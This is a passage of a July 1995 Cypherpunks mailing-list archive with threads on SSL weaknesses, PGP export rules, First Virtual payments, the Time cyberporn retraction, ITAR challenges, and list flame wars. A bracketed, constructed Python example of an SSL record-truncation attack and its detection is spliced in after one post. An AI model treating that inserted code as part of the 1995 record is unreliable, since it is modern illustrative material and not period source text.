However, he was released in the morning, just in time to get his female 
cat to the vet for spaying.  Lindsey sued his boss for invasion of privacy 
and sought punitive damages as well.

----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Sat, 29 Jul 95 14:47:15 PDT
To: perry@imsi.com
Subject: Re: Netscape the Big Win
In-Reply-To: <9507200747.AA15208@snark.imsi.com>
Message-ID: <9507292145.AA29335@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



> Crypto *is* integrated into Netscape. Unfortunately, the crypto is SSL
> -- a complete waste of time.
> 
> Among other things, SSL only lets you authenticate to X.509
> certificate roots that have been issued straight from the hands of Jim
> Bidzos -- which effectively means that you can secure only connections
> with Netscape commerce servers, and that you cannot authenticate both
> ends of the communications link. It's also just plain bad -- there are
> ugly holes in the security from what I can see. Netscape is, of
> course, pushing it as a standard. Vomit.
> 
> Luckily, Netscape recently hired Tahir El Gammal (did I put too many
> m's there?) and he's a smart guy. Unfortunately, he seems to be in a
> position where he has to defend the fairly bad work they did already.

Still in catch-up mode. . . .

As the person who evaluated Courier for Intuit, I feel compelled to
point out that Intuit does *not* endorse SSL.

I agree with all of Perry's criticisms, and offer a couple of my own:

1) since SSL is a sub-application-level protocol trying to solve an
application-level security problem, it leaves communicating nodes
vulnerable to early-termination attacks.  SSL MACs authenticate
individual SSL records, not application messages.

2) since only fools run http servers on secure network segments,
network admins are faced with the problem of clearing sensitive data
(presumably "protected" on the line by SSL) out of the DMZ in real
time.  This is a pain.

Fortunately, Courier suffers from neither of these infirmities.

   - Mark -


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D
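
[Added example, not part of Mark Chen's post and not code from any SSL implementation.] Point 1 above in a simplified model: a record layer that MACs each record accepts a stream cut off at a record boundary, while a length header carried inside the protected stream lets the application detect the early termination. HMAC-SHA256 stands in for the SSL record MAC; the key, record size, sample message and all function names are constructed for illustration.

```python
import hashlib
import hmac
import struct

KEY = b"constructed-demo-key"   # constructed sample key, shared by both ends
RECORD_SIZE = 16                # tiny records so one message spans several
MSG = b"ship order 1138 only after payment clears"   # constructed message


def record_mac(seq: int, payload: bytes) -> bytes:
    """MAC over (sequence number || payload) of ONE record."""
    data = struct.pack(">Q", seq) + payload
    return hmac.new(KEY, data, hashlib.sha256).digest()


def send_records(stream: bytes) -> list:
    """Sender side: split a byte stream into individually MACed records."""
    records = []
    for seq, off in enumerate(range(0, len(stream), RECORD_SIZE)):
        chunk = stream[off:off + RECORD_SIZE]
        records.append((seq, chunk, record_mac(seq, chunk)))
    return records


def receive_records(records: list) -> bytes:
    """Receiver side: check each record's sequence number and MAC.

    Nothing here can tell whether more records were supposed to follow.
    """
    out = b""
    for expected_seq, (seq, chunk, tag) in enumerate(records):
        if seq != expected_seq:
            raise ValueError("record out of sequence")
        if not hmac.compare_digest(tag, record_mac(seq, chunk)):
            raise ValueError("record MAC mismatch")
        out += chunk
    return out


def frame_message(body: bytes) -> bytes:
    """Application-level framing: 4-byte big-endian length, then the body.

    The header travels in the first record, so the record MAC protects it.
    """
    return struct.pack(">I", len(body)) + body


def parse_framed(stream: bytes) -> bytes:
    """Application-level check: the whole declared message must be present."""
    if len(stream) < 4:
        raise ValueError("truncated: length header missing")
    (declared,) = struct.unpack(">I", stream[:4])
    body = stream[4:4 + declared]
    if len(body) != declared:
        raise ValueError(
            "truncated: got %d of %d bytes" % (len(body), declared))
    return body


def deliver(stream: bytes, keep: int) -> bytes:
    """Model a connection closed after `keep` records reached the receiver."""
    return receive_records(send_records(stream)[:keep])


if __name__ == "__main__":
    # Record MACs only: the first record alone verifies and is accepted.
    print("unframed, 1 record kept:", deliver(MSG, 1))

    # Same cut with application framing: the shortfall is detected.
    try:
        parse_framed(deliver(frame_message(MSG), 1))
    except ValueError as err:
        print("framed, 1 record kept  :", err)

    # Complete delivery still round-trips.
    print("framed, all records    :", parse_framed(deliver(frame_message(MSG), 3)))
```
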



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Sat, 29 Jul 95 12:09:05 PDT
To: cypherpunks@toad.com
Subject: MIT PGP distribution site accessible from Canada
Message-ID: <ac40379800021004864c@[18.162.1.1]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

MIT PGP distribution site accessible from Canada

July 29, 1995

MIT is pleased to announce that, after consulting with the US State
Office of Defense Trade Controls, we have clarified procedures that
permit us to make our PGP distribution site accessible from Canada.
We would like to thank ODTC for helping us to make this possible.

People in Canada attempting to download PGP from MIT will be required
to assert that they are Canadian citizens and that they are obtaining
the software for end-use in Canada by Canadian citizens, or for return
to the United States.

You can obtain PGP via the World Wide Web at

        http://web.mit.edu/network/pgp.html

You can also obtain PGP via anonymous FTP to net-dist.mit.edu.
Connect to the directory pub/PGP and get and read the README
file.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sat, 29 Jul 95 12:39:05 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Zimmerman legal fund
In-Reply-To: <19336.9507291110@exe.dcs.exeter.ac.uk>
Message-ID: <199507291938.PAA08633@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Adam B wrote:
| Okay, now separate issue, really talking about FV now.  For me, the
| main thing holding me back from using it is that I'm not in the US,
| and don't have a US bank account to open a FV seller acct.  (I would
| have liked to use it as one of the few net payment systems actually up
| and running, as a payment method for the RSA T-shirts, it would have
| been a nice system, allowing me to effectively accept VISA payments
| which I have otherwise been unable to do.)

	Incidentally, the FV terms of service prohibit the sale of
material goods using FV as a payment system.  It's intended for selling
information, not physical products.  This is reflected in the fact
that the seller takes multiple risks of non-payment.

	You could probably get away with selling individualized,
signed tokens redeemable for a t-shirt after 30 days to mitigate your
risk, abide by FV's TOS, and make the buyers happy, but this seems
like a lot of work to use FV.

Adam S


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 29 Jul 95 15:53:23 PDT
To: cypherpunks@toad.com
Subject: Phillip Elmer Dewitt: "I screwed up"
Message-ID: <199507292251.PAA01251@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


there's an interesting debate going on over in alt.internet.media-coverage.
Philip Elmer-DeWitt has been posting a bit on his role in the "Rimm job".
Up until about now he has been very evasive, in denial, and seemingly
deflecting criticism and playing "spin doctor" with his article. 

however, IMHO a breakthrough just happened where below he apologizes, 
although not for anything specific. some on the
newsgroup are pressuring him to (1) run a new time story (2) issue
some kind of retraction or advice to other journalists based on what
he learned from the affair.

I would suggest emailing him and trying to be conciliatory (don't
flame his eyebrows off), but at the same time asking him to 
write something substantial about
his experience that can either be circulated on the internet or
in some other magazine. his experience in the affair, given in
simple bullet-list form, would be immensely valuable to other
reporters and could help "head off at the pass" (press?) many future 
internet-trashing articles. this is a very invaluable opportunity
for cpunks to not merely whine and rant, but to try to influence
the future in a positive way through your input.

also in the newsgroup is an article in which he describes how

1) he had several indications the article made "suspicious" claims
from people, including Mike Godwin of EFF, who he talked to on the phone
about twice or so. he also noticed that it made unsupportable claims,
even the one on the cover that tried to generalize the BBS info
to the Internet realm.

2) he was suspicious of Rimm at a point, particularly after Rimm
refused to elaborate on his background, and called his advisor
and Rimm personally, and Rimm assured him that "nothing in
his background would embarrass him or Time." apparently DeWitt
also had heard about the "casino study".


------- Forwarded Message

From: ped@panix.com (Philip Elmer-DeWitt)
Newsgroups: alt.internet.media-coverage,alt.culture.internet,alt.culture.usenet
Subject: Re: More PEDagogy (was Re: TIME Cover on Cyberporn)
Date: Thu, 27 Jul 1995 19:04:56 -0500


>         Yes, the damage is done.  Even an honest retraction at this 
> point won't alter the public perception that the net is awash in 
> pornography.  But I could honestly tell my students PED deserves 
> respect rather than scorn IF HE'D SWALLOW HIS PRIDE and urge his 
> colleagues to learn from his mistakes.
>         He probably won't.  I'm not sure I could take my own advice 
> were the roles reversed.  But PED, if you can't do what you should,
> at least spare us any more embarrassing rationalizations.    

Good advice. 

I don't know how else to say it, so I'll just repeat what I've said
before. I screwed up. The cover story was my idea, I pushed for it, and it
ran pretty much the way I wrote it. It was my mistake, and my mistake
alone. I do hope other reporters will learn from it. I know I have.

I've also tried to explain how it happened, not to rationalize my
mistakes, but to answer specific questions. I didn't want to seem
unresponsive, and I generally don't mind a little embarrassment. But I
think you are right; answering those questions in this forum is only
creating more bad will. If people are genuinely curious about how the
Cyberporn debacle came to be, I will reply to queries in e-mail.

- -- 
Philip Elmer-DeWitt                                   ped@well.com
TIME  Magazine                      http://www.pathfinder.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Sat, 29 Jul 95 13:02:58 PDT
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: The little sex kitten
Message-ID: <v01530501ac4040bb01c2@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:57 AM 7/29/95, Philip Zimmermann wrote:
>JUDGE RULES ON E-MAIL PRIVACY CASE
>
>TULSA, OKLA -- The Oklahoma Supreme Court has ruled on a case that many
>legal experts believe clearly delineates the e-mail privacy rights of
>computer users in the workplace.  Judge Stan Musing declared that employees
>have a right to expect that their employers will refrain from monitoring
>e-mail messages transmitted on company systems.

Far as I can tell, this is meaningless.  If you sign a paper "consenting"
to email monitoring by your employer, they've got a green light, period.
And under those circumstances, I'd think very few companies would be
foolish enough not to just ask you to sign.  So the only ones who have to
worry are those who don't get your "permission" first, and probably more
and more companies will just be more up front about it in the future.

The tightwad, privacy-loathing scumbags I work for sprang just such a
document on us recently, and after squirming and bitching about it for a
while, I actually did sign, simply because I wasn't prepared to lose my job
at that point.  My fear, based on well-established tradition, is that
eventually this will become widespread and more and more employers will
monitor email, with coerced "consent."

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (UnCensored Girls Anonymous)
Date: Sat, 29 Jul 95 14:18:26 PDT
To: cypherpunks@toad.com
Subject: Financial Latency Was: Zimmerman legal fund
Message-ID: <199507292118.OAA25623@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It isn't only clearing latency that's a problem. FV has already
taken over 5 days to deal with a simple account problem.

Latency might be a Good Thing(tm) in remailers, but it's a
Bad Thing(tm) in financial services. It's a "reputation market"
kinda thing. First Virtual is starting to fall down on many counts.
I'd have paid more if I could have found a place that would have
cleared things faster.

And....inasmuch as these are "real-time" computers we're dealing
with here on the net, bad transactions and fraud can be stopped cold.
Or with only minor losses, at the very most.

Love Always,

Carol Anne


>	Incidentally, the FV terms of service prohibit the sale of
>material goods using FV as a payment system.  It's intended for selling
>information, not physical products.  This is reflected in the fact
>that the seller takes multiple risks of non-payment.
>
>	You could probably get away with selling individualized,
>signed tokens redeemable for a t-shirt after 30 days to mitigate your
>risk, abide by FV's TOS, and make the buyers happy, but this seems
>like a lot of work to use FV.
>
>Adam S
>
>
>-- 
>"It is seldom that liberty of any kind is lost all at once."
>					               -Hume
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 29 Jul 95 16:25:12 PDT
To: "Christopher E. Stefan" <dc-stuff@fc.net>
Subject: Re: CDT report on Senate and House hearings on Online Pornography
Message-ID: <199507292324.QAA24490@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Crypto relevance:  Absolutely none.


At 03:52 PM 7/28/95 -0700, Christopher E. Stefan wrote:
> Somewhat interesting it seems, an ultra-conservative House is the First
> Amendment's biggest friend on the [...]

If ultra conservatives are folk who only increase school lunch 
funding by 4.5% (reducing the planned increase by 0.8%), who 
reduce the marriage penalty by $500, reduce government 
controlled broadcasting by 8%, and so forth,


What then would you call people who would reduce the marriage 
penalty by $4000, abolish school lunch funding, and end 
government controlled broadcasting.

Lunatic fringe ultra Nazis?

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Crypto Defender <crypto@shaq.midex.com>
Date: Sat, 29 Jul 95 09:02:14 PDT
To: cypherpunks@toad.com
Subject: Legal Crypto Bullshit and Lawyers reluctance
Message-ID: <Pine.3.89.9507291720.B9814-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


Actually I am a lawyer...hehe...

With the recent talk and action regarding the hooks for crypto in certain 
very valuable (or at least of increasing value) programs available on the 
net and elsewhere I find myself getting increasingly angry about the 
discourse and especially the arrogance of the parties involved.

As a lawyer, I often send demand letters first in cases where the chances 
of winning a case in court are small and the ability for my client to 
withstand extended billing is low.  In short, I send these letters as a 
weak effort backed up by little intent on pursuing the case (NOTE: I did 
not say no intent, I often do pursue cases with little or no money in 
them, and that explains why my school loans are not paid off 8-).

What I am saying is that these demand letters that are being sent, 
especially regarding tenuous positions such as programs with crypto hooks 
are ITAR restricted, are causing more damage than they need to.  I am not 
suggesting that Wei distribute his libraries and bear the brunt of 
prosecution.  But I am certain there are bigger institutional players out 
there that can.  I can not say we would take the case without obviously 
speaking with our management committee at my firm, but we often take on 
cases that will lose us money if they break into new areas of the law.

Someone must be on this list who, in good faith, honestly believes that 
the ITAR restrictions don't apply to every piece of software on the net.  
While I can not and am not advocating breaking the law, nor am I 
soliciting business because I am sending to a general email list, if 
someone is interested in a challenge other than Phil Zimmerman's let me 
know.  I also will not pursue anything without the relevant author's 
permission, obviously.  I am not intending to get people in trouble 
here.  I just feel that their stance on the law is weak at best and feel 
there has to be someone out there willing to take the chance.

Matt Miszewski
Attorney at Law
matt@midex.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Sat, 29 Jul 95 02:58:56 PDT
To: cypherpunks@toad.com
Subject: More about HTTP proxying: Harvest cache
Message-ID: <Pine.LNX.3.91.950729174802.874A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


Hal and others interested in HTTP proxying: I've just found an interesting 
alternative to CERN httpd at http://excalibur.usc.edu/ . I haven't yet 
played with it, but it looks promising. Caching should also play a useful 
role defeating traffic analysis, besides increasing the throughput.

[...]
  HIERARCHY

   The Harvest cache implements hierarchical caching: your cache at home
   can resolve URLs through your lab cache, which in turn can resolve
   requests through your institutional cache, which in turn can resolve
   requests through your regional network cache. The cache resolution
   algorithm, at each stage in the hierarchy, distinguishes parents from
   neighbor caches. A parent cache is a cache higher up the hierarchy,
   while a neighbor cache is one at the same level in the hierarchy.
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 29 Jul 95 15:46:28 PDT
To: carolab@censored.org
Subject: Re: Set phone permit "wire" taps
Message-ID: <9507292245.AA09763@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>I've been arrested too many times, and done enough local, state, and
>federal time to know.

Prove it.  Please post one date and location of incarceration as well
as an identifying number.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kdf@gigo.com (John Erland)
Date: Sat, 29 Jul 95 19:16:04 PDT
To: cypherpunks@toad.com
Subject: Mail2news Gates
Message-ID: <4f6_9507291907@gigo.com>
MIME-Version: 1.0
Content-Type: text/plain



futplex@pseudonym.com wrote in a message to John Erland:

fp> John Erland writes:
> Can someone send me a list of functioning mail-2-news gates?

fp> You asked this before (on June 4) and I answered (on June
fp> 21), but I take it you weren't reading the list then.

I specifically mentioned that I had but intermittent access to the list, but I
believe I got the answer netmail.  Unfortunately, it is already outdated, which
is why I am asking again.

fp> Briefly, Matt Ghio's list is the only publicly announced
fp> list I've found -- the pertinent Usenet FAQs point solely to
fp> his list. mailto:mg5n+remailers@andrew.cmu.edu for the
fp> current list. 

Coolio.  Just the thing!

fp> I don't know how much Matt's been updating it, but I have
fp> yet to find an alternative.

I hope he does it fairly frequently, as these gates seem to have a half-life of
about fifteen minutes.  @news.demon.co.uk was one of the old standbys that
seemed to be stable, but it appears to have locked us all out now.

Thanks for the address!

--- timEd 1.01
--
: Fidonet:  John Erland 1:203/8055.12  .. speaking for only myself.
: Internet: kdf@gigo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (UnCensored Girls Anonymous)
Date: Sat, 29 Jul 95 17:22:01 PDT
To: cypherpunks@toad.com
Subject: Re: Set phone permit "wire" taps
Message-ID: <199507300021.RAA26436@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


21445-175


>>I've been arrested too many times, and done enough local, state, and
>>federal time to know.
>
>Prove it.  Please post one date and location of incarceration as well
>as an identifying number.
>	/r$
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (UnCensored Girls Anonymous)
Date: Sat, 29 Jul 95 17:25:20 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Set phone permit "wire" taps
Message-ID: <199507300025.RAA26885@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Federal
Now SHOW ME something.
You sure question a lotta credentials,
like you've REALLY been somewhere or done something.

Love Always,

Carol Anne

>>I've been arrested too many times, and done enough local, state, and
>>federal time to know.
>
>Prove it.  Please post one date and location of incarceration as well
>as an identifying number.
>	/r$
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (UnCensored Girls Anonymous)
Date: Sat, 29 Jul 95 17:38:05 PDT
To: cypherpunks@toad.com
Subject: Re: Financial Latency Was: Zimmerman legal fund
Message-ID: <199507300037.RAA28696@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


As long as ya wanna deal with 'who' rather than what,
anything I post is irrelevant.
And the reality of realtime cash conversion isn't pretty.

And it makes no difference if it's Netcash, FV, CheckExpress
or whomever it is. FV just happened to be there. It's kind of
an illustrated example, for if I was really bitching, I'd cancel
my account with them, tack it on my .sig, and post it all over usenet.

For if you could sell shirts easily, you would. you aren't.
Latency problems in cash conversion is still why.

Love Always,

Carol Anne
ps methinks it's that heatwave that's got you.
>
>UnCensored Girls Anonymous writes:
>> It isn't only clearing latency that's a problem. FV has already
>> taken over 5 days to deal with a simple account problem.
>
>Thank you, but this is *not* the First Virtual Bitchline. This is
>Cypherpunks. Please take this elsewhere.
>
>Perry
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Sat, 29 Jul 95 18:48:51 PDT
To: David Mandl <dmandl@panix.com>
Subject: Re: The little sex kitten
In-Reply-To: <v01530501ac4040bb01c2@[166.84.250.21]>
Message-ID: <Pine.3.89.9507291922.A25503-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 29 Jul 1995, David Mandl wrote:

> The tightwad, privacy-loathing scumbags I work for sprang just such a
> document on us recently, and after squirming and bitching about it for a
> while, I actually did sign, simply because I wasn't prepared to lose my job
> at that point.  My fear, based on well-established tradition, is that
> eventually this will become widespread and more and more employers will
> monitor email, with coerced "consent."

That's OK - just use PGP :)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Sat, 29 Jul 95 18:53:41 PDT
To: UnCensored Girls Anonymous <carolann@censored.org>
Subject: Re: Set phone permit "wire" taps
In-Reply-To: <199507300025.RAA26885@mailhost.primenet.com>
Message-ID: <Pine.3.89.9507291902.B25503-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 29 Jul 1995, UnCensored Girls Anonymous wrote:

> Federal
> Now SHOW ME something.
> You sure question a lotta credentials,
> like you've REALLY been somewhere or done something.

Oh, he has.  He could tell you, but then he'd have to kill you ;)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Sat, 29 Jul 95 16:51:19 PDT
To: carolann@censored.org (UnCensored Girls Anonymous)
Subject: Re: Financial Latency Was: Zimmerman legal fund
In-Reply-To: <199507292118.OAA25623@mailhost.primenet.com>
Message-ID: <199507292351.TAA12568@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



UnCensored Girls Anonymous writes:
> It isn't only clearing latency that's a problem. FV has already
> taken over 5 days to deal with a simple account problem.

Thank you, but this is *not* the First Virtual Bitchline. This is
Cypherpunks. Please take this elsewhere.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Sat, 29 Jul 95 17:54:19 PDT
To: carolann@censored.org (UnCensored Girls Anonymous)
Subject: Re: Financial Latency Was: Zimmerman legal fund
In-Reply-To: <199507300037.RAA28696@mailhost.primenet.com>
Message-ID: <199507300054.UAA18561@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Let me be perfectly clear.

I have no idea who or what you are. You post constant streams of
unparseable garbage (presumably produced by your very own wetware
rather than a random string generator but it's hard to tell) to this
mailing list. So long as the stuff bears some passing resemblance to
discussion of cryptography, well, it's not up to me to criticize you
just for being incomprehensible.  

However, it appears that you have some sort of weird problem with
First Virtual that you don't have the common sense to resolve in
private. Please deal with it privately. It's possible that I'm wrong
and that you are discussing cryptography, but as your English prose is
completely indecipherable to this cryptographer there is no way
whatsoever to know, which makes it as good as irrelevant.

Perry

PS If your postings are in fact some sort of weird steganographic
cover for some meaningful message, which is one possible (unlikely)
explanation for them, I would suggest posting them to alt.test
instead.

UnCensored Girls Anonymous writes:
> As long as ya wanna deal with 'who' rather than what,
> anything I post is irrelevant.
> And the reality of realtime cash conversion isn't pretty.
> 
> And it makes no difference if it's Netcash, FV, CheckExpress
> or whomever it is. FV just happened to be there. It's kind of
> an illustrated example, for if I was really bitching, I'd cancel
> my account with them, tack it on my .sig, and post it all over usenet.
> 
> For if you could sell shirts easily, you would. you aren't.
> Latency problems in cash conversion is still why.
> 
> Love Always,
> 
> Carol Anne
> ps methinks it's that heatwave that's got you.
> >
> >UnCensored Girls Anonymous writes:
> >> It isn't only clearing latency that's a problem. FV has already
> >> taken over 5 days to deal with a simple account problem.
> >
> >Thank you, but this is *not* the First Virtual Bitchline. This is
> >Cypherpunks. Please take this elsewhere.
> >
> >Perry
> >
> >
> --
> 
> Member Internet Society  - Certified BETSI Programmer  -  Webmistress
> ***********************************************************************
> Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
> My Homepage
> The Cyberdoc
> ***********************************************************************
> ------------------ PGP.ZIP Part [017/713] -------------------
> M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
> MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
> MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
> -------------------------------------------------------------
> for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 29 Jul 95 18:33:03 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Mail2news Gates
In-Reply-To: <9507300108.AA00621@mtjava.llnl.gov>
Message-ID: <199507300131.VAA24713@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


John Erland writes:
> Can someone send me a list of functioning mail-2-news gates?

You asked this before (on June 4) and I answered (on June 21), but I take it
you weren't reading the list then.  Briefly, Matt Ghio's list is the only
publicly announced list I've found -- the pertinent Usenet FAQs point solely
to his list. mailto:mg5n+remailers@andrew.cmu.edu for the current list.

I don't know how much Matt's been updating it, but I have yet to find an
alternative.

My previous reply may be found at http://www.hks.net/cpunks/cpunks-15/1567.html

[...]
> Also, is there a method by which one can access (via netmail) a list of the
> newsgroups served by a given mail-2-news gate?

I'm not aware of any standard protocol for this. Try sending mail to system@,
root@, etc.

-Futplex <futplex@pseudonym.com>
ObFlame1: Anon, if only nsb@fv *did* write copiously here !
ObFlame2: Brad D., at least make Orlin send this crap to the list himself



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sat, 29 Jul 95 20:44:12 PDT
To: CYPHERPUNKS@toad.com
Subject: CMOS
Message-ID: <8AE251D.000300028A.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


O > stored?  How much space is in the "memory" of CMOS?

  Typically, on the order of 64 bytes.  YMMV.




 * Forrest Gump of Borg:
Assimilation is =not= like a box of chocolates....
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sat, 29 Jul 95 19:04:12 PDT
To: cypherpunks@toad.com
Subject: Re: Financial Latency noise
Message-ID: <199507300201.WAA08367@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

There is no way for both of you to get in the last word, so allow me.
You're both right. Now please, make it stop!
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMBrnCW1lp8bpvW01AQESGgP/Vtfym5YJh7lNUd2wWRNvFnS+mmHwWE6X
DyVMPZ089YBqkxJUiXd74TyIVuoO90FiCMi6GbcRS9QziZRcVtl71hNdQb/IB62G
